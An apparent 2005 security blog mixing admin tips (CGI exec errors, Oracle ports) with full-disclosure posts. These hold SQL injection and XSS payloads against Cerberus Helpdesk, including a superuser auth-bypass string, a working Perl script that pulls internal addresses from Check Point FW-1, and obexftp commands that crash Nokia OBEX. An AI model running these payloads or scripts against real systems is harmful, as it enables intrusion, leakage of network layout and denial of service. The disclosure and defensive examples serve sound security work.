Tuesday, 27 December 2005

(8)Exec format error

When executing a CGI that lives in cgi-bin.

Possible causes:

* The usual interpreter header (#!/bin/sh, #!/usr/bin/perl, ...) is not set correctly
* dos2unix is your friend (aka tr -d '\015')
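A small diagnostic for the two causes listed above, added here as an example (not part of the original post). It checks a CGI script for a missing #! line and for a shebang terminated by CR, strips the CR the way tr -d '\015' does, and, for a file on disk, also checks the execute bit; the sample scripts are constructed inline.

```python
import os
import sys

# Constructed sample scripts (not from the page) used to exercise the check.
CRLF_SCRIPT = b"#!/usr/bin/perl\r\nprint \"Content-type: text/plain\\n\\nhi\\n\";\r\n"
GOOD_SCRIPT = b"#!/bin/sh\necho 'Content-type: text/plain'\necho\necho hi\n"
NO_SHEBANG = b"echo 'Content-type: text/plain'\necho\necho hi\n"


def shebang_problems(data: bytes) -> list:
    """Return the header defects that make the kernel answer ENOEXEC (Exec format error)."""
    problems = []
    first = data.split(b"\n", 1)[0]
    if not first.startswith(b"#!"):
        return ["no #! interpreter line"]
    if first.endswith(b"\r"):
        # With DOS line endings the interpreter path becomes '/usr/bin/perl\r',
        # which does not exist, so the kernel cannot start the interpreter.
        problems.append("shebang line ends with CR (DOS line ending; run dos2unix)")
        first = first[:-1]
    parts = first[2:].split()
    if not parts:
        problems.append("#! line names no interpreter")
    elif not os.path.isfile(parts[0]):
        problems.append("interpreter %s not found" % parts[0].decode(errors="replace"))
    return problems


def dos2unix(data: bytes) -> bytes:
    """Equivalent of tr -d '\\015': drop every carriage return."""
    return data.replace(b"\r", b"")


def check_cgi_file(path: str) -> list:
    """Check one script in cgi-bin, including the execute bit the web server needs."""
    with open(path, "rb") as fh:
        problems = shebang_problems(fh.read())
    if not os.access(path, os.X_OK):
        problems.append("not executable (chmod +x)")
    return problems


if __name__ == "__main__":
    for name in sys.argv[1:]:
        print(name, check_cgi_file(name) or "ok")
```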

Wednesday, 21 December 2005

Oracle Port Usage (Sorted by Port Number)


http://osi.oracle.com/CollaborationSuite9041/doc/install/ports.htm


21 Oracle Files - FTP (default value)
110 Oracle Email - POP
119 Oracle Email - NNTP
139 Oracle Files - SMB
389 LDAP (Oracle Internet Directory)
548 Oracle Files - AFP
563 Oracle Email NNTP- SSL
636 Oracle Internet Directory- SSL
995 Oracle Email POP- SSL
1521 Oracle Workflow - TNS
1748 Oracle Enterprise Manager Intelligent Agent
1754 Oracle Enterprise Manager Intelligent Agent
1808 Oracle Enterprise Manager Intelligent Agent
1809 Oracle Enterprise Manager Intelligent Agent
1810 Oracle Enterprise Manager Application Server Service
1811 Oracle Enterprise Manager Application Server Service
1950 Oracle9iAS Reports Services SQL*Net
2049 Oracle Files - NFS (default value)
2070 Oracle9iAS Syndication Server (OSS); To access OSS
3001 Oracle9iAS Containers for J2EE - AJP
3101 Oracle9iAS Containers for J2EE - RMI
3201 Oracle9iAS Containers for J2EE - JMS
3301 Oracle9iAS Containers for J2EE HTTP Listener
4000 Oracle9iAS Web Cache Administration Port
4001 Oracle9iAS Web Cache Invalidation Port
4002 Oracle9iAS Web Cache Statistics
4031 Oracle Internet Directory SSL
4032 Oracle Internet Directory non-SSL
4443 Oracle HTTP Server- SSL, Oracle HTTP Server Listen- SSL, Oracle9iAS Web Cache Listen- SSL
4444 Oracle HTTP Server Listen- SSL if Oracle9iAS Web Cache is installed and configured
5000 Oracle9iAS Single Sign-On
5100 Oracle Email
5730 Oracle Calendar
5731 Oracle Calendar
5732 Oracle Calendar
5734 Oracle Calendar server manager
6003 Oracle HTTP Server- Oracle Notification Service Request Port
6100 Oracle HTTP Server- Oracle Notification Service Local Port
6200 Oracle HTTP Server- Oracle Notification Service Remote Port
6666 Oracle9iAS Clickstream Collector Agent
6675 Oracle9iAS Clickstream Collector Server
6676 Oracle9iAS Clickstream Execution Engine
7000 Oracle HTTP Server Java Object Cache
7771 Oracle Management Server
7772 Oracle Management Server
7773 Oracle Management Server
7777 Oracle HTTP Server- non-SSL, Oracle HTTP Server Listen- non-SSL, Oracle9iAS Web Cache Listen-non-SSL
7778 Oracle HTTP Server Listen- non-SSL if Oracle9iAS Web Cache is installed and configured
8007 Oracle HTTP Server JServ Servlet Engine
9000 Oracle9iAS Wireless PIM Notification Dispatcher
14000 Oracle9iAS Reports Services Visigenics - CORBA
16001 IIOP
53000 range Oracle Files Domain Controller and Nodes
53000 range Oracle Files Main Node
53000 range Oracle Files HTTP Node

Sunday, 18 December 2005

Cerberus Helpdesk multiple vulnerabilities.

Title: Cerberus Helpdesk multiple vulnerabilities.
Severity: Medium
Affected: cerberus-gui (2.649), support-center (2.6493.2.0pr2)
Problem type: remote


Description:
-------------------------------------------------------------------------------

Cerberus Helpdesk is a WebGroup Media helpdesk suite written in PHP.
Official webpage: http://www.cerberusweb.com/



Details:
-------------------------------------------------------------------------------

support-center:
*******************************

SQL injection in attachment_send.php (line 112):
You can download other users' files or use blind SQL injection attacks.
Example URL:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N [SQL] &thread_id=1
CODE:
$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id = $file_id";

XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E



cerberus-gui (parser-related):
*******************************

There are a few SQL injections if the XML is maliciously generated:

SQL injections in email_parser.php:

Function: "is_queue_address" (line: 1397) doesn't check the "$addy" value properly.
CODE:
$sql = sprintf("SELECT q.queue_name, q.queue_mode, q.queue_email_display_name, ".
"qa.queue_addresses_id, qa.queue_id, qa.queue_address, ".
"qa.queue_domain, q.queue_prefix, q.queue_response_open, ".
"q.queue_send_open, q.queue_response_gated ".
"FROM queue_addresses qa ".
"LEFT JOIN queue q USING (queue_id) ".
"WHERE LOWER(qa.queue_address) = '%s' ".
"AND LOWER(qa.queue_domain) = '%s'",
strtolower($mailbox),
strtolower($domain)
);

Function: "is_banned_address" (line: 752) doesn't check "$address" properly.
CODE:
$sql = "SELECT a.address_banned FROM address a WHERE a.address_address = '".$address."'";

Function: "is_admin_address" (line 1532): you can bypass this function by using, as the email address, the following query: "'OR'u.user_superuser'='1'--".
Example of the resulting query:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '' OR u.user_superuser = '1'
CODE:
$sql = "SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '$address'";


SQL injection in structs.php:
Function: "cer_email_address_struct" (line: 167) doesn't check the input of the following query.
CODE:
$sql = "SELECT a.address_id,a.address_banned FROM address a WHERE a.address_address = '" . $a_address . "'";


cerberus-gui:
*******************************

SQL injection in cer_KnowledgebaseHandler.class.php:
Function: "_load_article_details" (line 270): you can fetch the "superuser" md5 password with blind SQL injection.
Example URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
CODE:
$sql = "SELECT k.kb_id, k.kb_entry_date, k.kb_public, k.kb_category_id, k.kb_keywords, kp.kb_problem_summary, kp.kb_problem_text, kp.kb_problem_text_is_html, " .
" ks.kb_solution_text, ks.kb_solution_text_is_html, kc.kb_category_name, u.user_login As entry_user, k.kb_avg_rating, k.kb_rating_votes " .
" FROM knowledgebase k LEFT JOIN knowledgebase_problem kp ON (kp.kb_id=k.kb_id) LEFT JOIN knowledgebase_solution ks on (ks.kb_id=k.kb_id) ".
" LEFT JOIN knowledgebase_categories kc ON (kc.kb_category_id=k.kb_category_id) LEFT JOIN user u ON (k.kb_entry_user=u.user_id) " .
" WHERE k.kb_id = " . $kbid;


SQL injection in "addresses_export.php":
Example URL:
POST: /cerberus-gui/addresses_export.php
sid=c61ce82aa50569705dd774c33644446c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x
CODE:
$sql = "SELECT DISTINCT a.address_address FROM ticket t LEFT JOIN thread th ON (t.min_thread_id=th.thread_id)
LEFT JOIN address a ON (th.thread_address_id=a.address_id) WHERE t.ticket_queue_id IN ($queues) ORDER BY a.address_address ASC;";

SQL injection in "display.php": "$thread" is not checked.
CODE:
$sql = "SELECT th.thread_address_id, a.address_address FROM thread th LEFT JOIN address a ON (th.thread_address_id = a.address_id) ".
"WHERE th.thread_id = " . $thread;

SQL injection in "display_ticket_thread.php" (line 52).
Example URL:
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]
CODE:
$sql = "SELECT t.ticket_id, t.ticket_subject, t.ticket_status, t.ticket_date, t.ticket_assigned_to_id, t.ticket_queue_id, t.ticket_priority, th.thread_address_id, ad.address_address, t.queue_addresses_id, q.queue_name " .
"FROM ticket t, thread th, address ad, queue q " .
"WHERE t.ticket_queue_id IN ($u_qids) AND th.ticket_id = t.ticket_id AND t.ticket_queue_id = q.queue_id AND th.thread_address_id = ad.address_id AND t.ticket_id = " . $ticket . " GROUP BY th.thread_id LIMIT 0,1";


Solution:
-------------------------------------------------------------------------------
Not available; perhaps change every "$cerberus_db->query($sql)" to "$cerberus_db->escape($sql)".
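Escaping only helps where the value lands inside quotes; the unquoted numeric parameters in this advisory ($kbid, $thread, $ticket, $file_id, $queues) have nothing to escape, so the value is still spliced in as SQL. The example below is added here and is not Cerberus code: it uses an in-memory SQLite stand-in for the address and knowledgebase tables (constructed, not the real schema) and SQLite quote-doubling in place of $cerberus_db->escape() (MySQL escapes with backslashes, but the point is the same).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for two Cerberus tables (constructed here, not the real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE knowledgebase (kb_id INTEGER, kb_keywords TEXT)")
    db.executemany("INSERT INTO knowledgebase VALUES (?, ?)",
                   [(4, "public entry"), (5, "internal only")])
    db.execute("CREATE TABLE address (address_address TEXT, address_banned INTEGER)")
    db.executemany("INSERT INTO address VALUES (?, ?)",
                   [("o'brien@example.invalid", 1), ("bob@example.invalid", 0)])
    return db


def escape(value: str) -> str:
    """Stand-in for $cerberus_db->escape(): neutralise single quotes (SQLite doubles them)."""
    return value.replace("'", "''")


def is_banned_escaped(db, address: str):
    # Quoted string context, as in is_banned_address(): escaping the value is enough here,
    # a quote in the input stays data.
    sql = ("SELECT a.address_banned FROM address a WHERE a.address_address = '"
           + escape(address) + "'")
    return db.execute(sql).fetchone()


def load_article_escaped(db, kbid: str):
    # Unquoted numeric context, as in _load_article_details(): there is no quote to
    # escape, so whatever follows the number is executed as SQL.
    sql = "SELECT k.kb_id, k.kb_keywords FROM knowledgebase k WHERE k.kb_id = " + escape(kbid)
    return db.execute(sql).fetchall()


def load_article_param(db, kbid: str):
    # Hardened form: reject anything but digits, then bind the value as a parameter.
    if not kbid.isdigit():
        raise ValueError("kbid must be an integer")
    sql = "SELECT k.kb_id, k.kb_keywords FROM knowledgebase k WHERE k.kb_id = ?"
    return db.execute(sql, (int(kbid),)).fetchall()
```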


History:
-------------------------------------------------------------------------------
15-20/Nov/2005 --- Bugs discovered
11/Dec/2005 --- The author has been notified.
19/Dec/2005 --- Full disclosure

Blind SQL Injection PoC Tool.

I have developed a script, based on the code by ilo- (www.reversing.org),
that brute-forces websites that have a blind SQL injection flaw.

I have also published some flaws I tested the tool against, as well as
a video showing how it works...

hacktimes is also going to publish an article on blind SQL injection with
more information.

bsqlbf.pl: script
bsqlbf.avi: video


Tuesday, 13 December 2005

Get private address from fw-1 (old bug)

#!/usr/bin/perl
# Wed Dec 14 01:44:29 CET 2005
# Get private address from fw-1, nothing new, only a working port.
# ref: http://www.securityfocus.com/bid/8524/info
# !dSR www.digitalsec.es

use strict;
use IO::Socket;

die "usage: $0 <firewall-ip>\n" unless @ARGV;

my ($bytes, $host, @hosts) = ();
# TCP 256 is the FW-1 SecuRemote topology service
my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0], PeerPort => 256,
                                Proto => 'tcp') or die "ERROR! $!\n";
print $sock "\x31\x00\x00\x00";
print $sock "\x00\x00\x00\x0C\x00\x00\x00\x04\xD4\xA3\x9F\x02";
# Read whatever the firewall answers and keep it as a hex string
while (<$sock>) { $bytes .= unpack("H*", $_); }
print "fw1 string: $bytes\n";
print substr($bytes, 16) . "\n";
my $i = 0;
# After the 8-byte header each address is 4 bytes, i.e. 8 hex digits
foreach ((substr $bytes, 16) =~ /(.{8})/g) {
    $host = ();
    foreach my $ip (/(.{2})/g) {
        $host .= hex($ip) . ".";
    }
    $host =~ s/\.$//;
    last if $host =~ /0\.0\.0/;   # an all-zero address ends the list
    push(@hosts, $host);
}
foreach (@hosts) { $i++; print "ipaddr[$i]: $_\n"; }

download pl





Nokia 7610, 3650 Denial of Service in OBEX.

Severity: Low
Affected: tested on the Nokia 7610 and Nokia 3650 (possibly other Symbian
phones).
Problem type: remote

Details:
--------------------------------------------------------------------------------

There is a flaw in the OBEX implementation of the Nokia 7610 (V4.0.437
15-09-04 RH51), and others, that disables this service if you send a
file whose name is ":" or "\".

----
Quote of IROBEX12.pdf Pag:40, section 4.3 -- (OBEX specification)

"Pushing objects into the inbox Objects are pushed into the inbox by using
the PUT command with a Name header. The string in the Name header
should not contain any path characters such as ':', '/' or '\'. Objects with
improperly formed names should be rejected."
----

The device asks for a PIN if you are not paired, or asks whether you want to
accept the connection from the remote device; you have to ACCEPT. The risk is
low, because the flaw does not work if you do not accept the incoming connection.

If the connection is established, the file is sent and there is no "New
message arrived" notification, as there would be when you send a correct
file. That is fine: the filename is dropped.

The problem is that the OBEX service no longer works after this: if you
try to send another file, or a vCard from another device, you cannot
connect to the remote OBEX service again.

Demonstration with Linux as the client:


jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610


jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing other file after send ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
--------------------------------------------------------------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.


dab @ !dSR
http://www.digitalsec.net